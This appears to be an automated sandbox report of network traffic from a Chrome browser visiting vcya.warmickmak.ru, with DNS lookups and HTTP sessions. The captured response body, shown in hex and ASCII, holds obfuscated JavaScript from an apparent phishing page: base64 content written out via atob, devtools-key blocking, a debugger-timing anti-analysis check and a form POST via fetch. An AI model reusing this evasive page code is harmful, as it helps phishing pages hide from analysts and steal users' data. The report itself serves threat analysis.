                            Dec 18, 2024 21:05:30.453934908 CET192.168.2.41.1.1.10x8c85Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.454063892 CET192.168.2.41.1.1.10x545bStandard query (0)code.jquery.com65IN (0x0001)false
                            Dec 18, 2024 21:05:30.454577923 CET192.168.2.41.1.1.10xda0fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.454731941 CET192.168.2.41.1.1.10x812Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:30.455061913 CET192.168.2.41.1.1.10xaf51Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.455189943 CET192.168.2.41.1.1.10x3d7dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:32.560161114 CET192.168.2.41.1.1.10x5dc2Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.560312033 CET192.168.2.41.1.1.10x2dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:32.725775003 CET192.168.2.41.1.1.10xee61Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.725923061 CET192.168.2.41.1.1.10x1b60Standard query (0)code.jquery.com65IN (0x0001)false
                            Dec 18, 2024 21:05:34.367292881 CET192.168.2.41.1.1.10x2633Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:34.367429018 CET192.168.2.41.1.1.10x1f3dStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:34.385118008 CET192.168.2.41.1.1.10xe144Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:34.385270119 CET192.168.2.41.1.1.10xa701Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:38.961780071 CET192.168.2.41.1.1.10x4991Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:38.961901903 CET192.168.2.41.1.1.10x6debStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 18, 2024 21:05:24.250401974 CET1.1.1.1192.168.2.40xec43No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:24.250444889 CET1.1.1.1192.168.2.40xc306No error (0)www.google.com65IN (0x0001)false
                            Dec 18, 2024 21:05:26.410732031 CET1.1.1.1192.168.2.40xe47eNo error (0)vcya.warmickmak.ru172.67.158.29A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:26.410732031 CET1.1.1.1192.168.2.40xe47eNo error (0)vcya.warmickmak.ru104.21.14.62A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:26.410753012 CET1.1.1.1192.168.2.40xca55No error (0)vcya.warmickmak.ru65IN (0x0001)false
                            Dec 18, 2024 21:05:30.591875076 CET1.1.1.1192.168.2.40xda0fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.591875076 CET1.1.1.1192.168.2.40xda0fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.591983080 CET1.1.1.1192.168.2.40x812No error (0)challenges.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:30.592082024 CET1.1.1.1192.168.2.40xaf51No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.592082024 CET1.1.1.1192.168.2.40xaf51No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.592118025 CET1.1.1.1192.168.2.40x3d7dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:30.592430115 CET1.1.1.1192.168.2.40x8c85No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.592430115 CET1.1.1.1192.168.2.40x8c85No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.592430115 CET1.1.1.1192.168.2.40x8c85No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:30.592430115 CET1.1.1.1192.168.2.40x8c85No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.705060005 CET1.1.1.1192.168.2.40x5dc2No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.705060005 CET1.1.1.1192.168.2.40x5dc2No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.705828905 CET1.1.1.1192.168.2.40x2dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:32.863056898 CET1.1.1.1192.168.2.40xee61No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.863056898 CET1.1.1.1192.168.2.40xee61No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.863056898 CET1.1.1.1192.168.2.40xee61No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:32.863056898 CET1.1.1.1192.168.2.40xee61No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:34.503891945 CET1.1.1.1192.168.2.40x2633No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:34.503891945 CET1.1.1.1192.168.2.40x2633No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:34.504057884 CET1.1.1.1192.168.2.40x1f3dNo error (0)challenges.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:34.522097111 CET1.1.1.1192.168.2.40xe144No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:34.522097111 CET1.1.1.1192.168.2.40xe144No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:34.522121906 CET1.1.1.1192.168.2.40xa701No error (0)challenges.cloudflare.com65IN (0x0001)false
                            Dec 18, 2024 21:05:39.099678040 CET1.1.1.1192.168.2.40x4991No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                            • vcya.warmickmak.ru
                            • https:
                              • cdnjs.cloudflare.com
                              • challenges.cloudflare.com
                              • code.jquery.com
                            • a.nel.cloudflare.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449743172.67.158.294433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:29 UTC668OUTGET /PrEvJj/ HTTP/1.1
                            Host: vcya.warmickmak.ru
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:30 UTC1248INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Cache-Control: no-cache, private
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HYKQ6qThDW0lKnQ6jD6o4NkGgJEleA%2B3N%2BhMXsZog21%2Fes3pJ%2BshhISLqr%2FciEFJhqvzawcPj3E8Fdhl8Z7BBXTslDymtewp62UFCFVX7BaMwFMjmVFzKU9EBe9JdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=34291&min_rtt=34279&rtt_var=12880&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1573&delivery_rate=82838&cwnd=234&unsent_bytes=0&cid=c3a97c24d81fcda2&ts=512&x=0"
                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImE0YThTWFVJa3JQdGExUjc2Mnlpbmc9PSIsInZhbHVlIjoiMUdMMlB3L1VudnIrSWhBNldjdVpRSzZTMlZmOWEwNWF0MG93SERrUUdOamFDRlpEQjIxVWtFUGZYV0gxWVFIanVRNGI3T3ZQdzlNNUlIQkJKRzNXWlNqdU5nQ0VHUGY3a3FiMmREeWlreG9Lb3M3WjExekZBVkJWVzlmd3puN3giLCJtYWMiOiI5MTNiMTU0NzgyOGZiZmFlOThiZDdhNTNkODYzYjE4ZDM4NTI2YzgyZWIzNzFhODU4MGQ2MWM4ZWY1MDJiM2VmIiwidGFnIjoiIn0%3D; expires=Wed, 18-Dec-2024 22:05:29 GMT; Max-Age=7200; path=/; secure; samesite=none
                            2024-12-18 20:05:30 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 46 45 56 44 5a 45 4e 56 4a 71 54 6c 4e 32 62 7a 68 6b 53 6c 4a 42 51 6d 64 76 57 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 6c 4e 69 52 48 64 4f 62 44 63 34 4e 31 4e 33 4f 56 6f 30 52 6b 74 48 54 57 64 4f 4e 57 4a 77 62 54 4a 34 56 32 4a 53 4c 32 46 30 4e 6a 6c 43 61 7a 4e 70 59 31 6c 6f 62 57 64 59 62 58 52 43 62 6a 45 72 64 48 6c 4f 57 6b 30 32 62 31 5a 6d 55 48 42 69 64 55 56 55 63 57 35 6b 56 48 64 30 64 33 5a 7a 61 6a 42 75 4e 58 64 69 61 47 70 7a 4f 57 4d 7a 65 55 52 35 52 31 6c 42 52 6c 6b 72 52 48 5a 4d 51 54 6c 73 63 79 74 54 4f 57 6f 78 52 45 6b 78 56 46 68 43 53 48 6b 7a 59 55 6f 7a 63 55 56 78 57 48 70 36 56 57 49
                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjFEVDZENVJqTlN2bzhkSlJBQmdvWkE9PSIsInZhbHVlIjoielNiRHdObDc4N1N3OVo0RktHTWdONWJwbTJ4V2JSL2F0NjlCazNpY1lobWdYbXRCbjErdHlOWk02b1ZmUHBidUVUcW5kVHd0d3ZzajBuNXdiaGpzOWMzeUR5R1lBRlkrRHZMQTlscytTOWoxREkxVFhCSHkzYUozcUVxWHp6VWI
                            2024-12-18 20:05:30 UTC1249INData Raw: 34 64 61 0d 0a 3c 21 2d 2d 20 49 66 20 79 6f 75 20 72 65 61 6c 6c 79 20 6c 6f 6f 6b 20 63 6c 6f 73 65 6c 79 2c 20 6d 6f 73 74 20 6f 76 65 72 6e 69 67 68 74 20 73 75 63 63 65 73 73 65 73 20 74 6f 6f 6b 20 61 20 6c 6f 6e 67 20 74 69 6d 65 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 32 51 33 6c 42 4c 6e 64 68 63 6d 31 70 59 32 74 74 59 57 73 75 63 6e 55 76 55 48 4a 46 64 6b 70 71 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57
                            Data Ascii: 4da... If you really look closely, most overnight successes took a long time. --><script>if(atob("aHR0cHM6Ly92Q3lBLndhcm1pY2ttYWsucnUvUHJFdkpqLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW
                            2024-12-18 20:05:30 UTC1369INData Raw: 34 37 39 33 0d 0a 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 56 6b 62 6d 68 58 61 48 6c 79 63 6b 59 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 64 57 52 75 61 46 64 6f 65 58 4a 79 52 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 56 6b 62 6d 68 58 61 48 6c 79 63 6b 59 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 4d 79 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51
                            Data Ascii: 4793oxMjAwcHgpew0KI3VkbmhXaHlyckYgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojdWRuaFdoeXJyRiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3VkbmhXaHlyckYuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTMycHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ
                            2024-12-18 20:05:30 UTC1369INData Raw: 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79
                            Data Ascii: msiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3Ry
                            2024-12-18 20:05:30 UTC1369INData Raw: 64 56 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 43 63 30 56 54 54 6c 46 72 51 32 68 48 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 52 56 47 35 73 59 56 42 4f 63 55 46 6f 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 52 56 47 35 73 59 56 42 4f 63 55 46 6f 49 43 30 67 51 6e 4e 46 55 30 35 52 61 30 4e 6f 52 79 41 2b 49
                            Data Ascii: dVID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBCc0VTTlFrQ2hHID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBRVG5sYVBOcUFoID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChRVG5sYVBOcUFoIC0gQnNFU05Ra0NoRyA+I
                            2024-12-18 20:05:30 UTC1369INData Raw: 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 56 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6c 42 30 57 55 46 32 51 32 70 33 52 55 49 69 50 67
                            Data Ascii: 9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHVhIiBuYW1lPSJibHRkdWEiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9IlB0WUF2Q2p3RUIiPg
                            2024-12-18 20:05:30 UTC1369INData Raw: 64 47 56 34 64 43 41 39 50 53 41 77 4b 58 73 4e 43 69 41 67 49 43 42 6d 5a 58 52 6a 61 43 68 52 59 6c 4e 55 57 45 74 6d 52 31 6c 36 4c 43 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6c 42 50 55 31 51 69 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 42 69 62 32 52 35 4f 69 42 75 5a 58 63 67 52 6d 39 79 62 55 52 68 64 47 45 6f 63 47 70 34 59 6c 5a 48 51 32 31 6b 54 43 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41
                            Data Ascii: dGV4dCA9PSAwKXsNCiAgICBmZXRjaChRYlNUWEtmR1l6LCB7DQogICAgICAgIG1ldGhvZDogIlBPU1QiLA0KICAgICAgICBib2R5OiBuZXcgRm9ybURhdGEocGp4YlZHQ21kTCkNCiAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICA
                            2024-12-18 20:05:30 UTC1369INData Raw: 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 4c 42 77 77 5a 6a 72 45 48 75 20 3d 3d 20 79 58 68 52 59 6c 6d 71 6c 54 29 7b 0d 0a 63 6f 6e 73 74 20 5a 5a 4c 4b 71 53 4b 4d 64 6a 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 57 75 6b 7a 5a 70 4f 77 56 45 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 57 75 6b 7a 5a 70 4f 77 56 45 2e 70 61 74 68 6e 61 6d 65 20 3d 20 57 75 6b 7a 5a 70 4f 77 56 45 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 53 78 45 6a 43 56 75 54 75 43 20 3d 20 57 75 6b 7a 5a 70 4f 77 56 45 2e
                            Data Ascii: join('.');if(LBwwZjrEHu == yXhRYlmqlT){const ZZLKqSKMdj = window.location.pathname.split('%23')[0].split('%3F')[0];if (WukzZpOwVE.pathname.endsWith('/')) {WukzZpOwVE.pathname = WukzZpOwVE.pathname.slice(0, -1);}const SxEjCVuTuC = WukzZpOwVE.
                            2024-12-18 20:05:30 UTC1369INData Raw: 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 56 6b 62 6d 68 58 61 48 6c 79 63 6b 59 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 64 57 52 75 61 46 64 6f 65 58 4a 79 52 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 56 6b 62 6d 68 58 61 48 6c 79 63 6b 59 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 4d 79 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36
                            Data Ascii: WR0aDoxMjAwcHgpew0KI3VkbmhXaHlyckYgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojdWRuaFdoeXJyRiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3VkbmhXaHlyckYuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTMycHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6
                            2024-12-18 20:05:30 UTC1369INData Raw: 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62
                            Data Ascii: siOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3Ryb


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449745104.17.24.144433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:31 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                            Host: cdnjs.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://vcya.warmickmak.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:32 UTC966INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:32 GMT
                            Content-Type: application/javascript; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=30672000
                            ETag: W/"61182885-40eb"
                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                            cf-cdnjs-via: cfworker/kv
                            Cross-Origin-Resource-Policy: cross-origin
                            Timing-Allow-Origin: *
                            X-Content-Type-Options: nosniff
                            CF-Cache-Status: HIT
                            Age: 8187
                            Expires: Mon, 08 Dec 2025 20:05:32 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW%2Bgy%2BcpKR%2B4lvoG5oK5kSswnqi7lo0vQeU47rGd4HUVLOOktlF%2BQsU1StI6ILYHE8rD5OCANKtyGB23BhKEsNKJuXllnuerII%2F28kaFpNLkC%2FwiqIb%2B6LGot6eWtcpz3lbzCP%2FN"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                            Strict-Transport-Security: max-age=15780000
                            Server: cloudflare
                            CF-RAY: 8f41c4ab9f6a7d08-EWR
                            alt-svc: h3=":443"; ma=86400
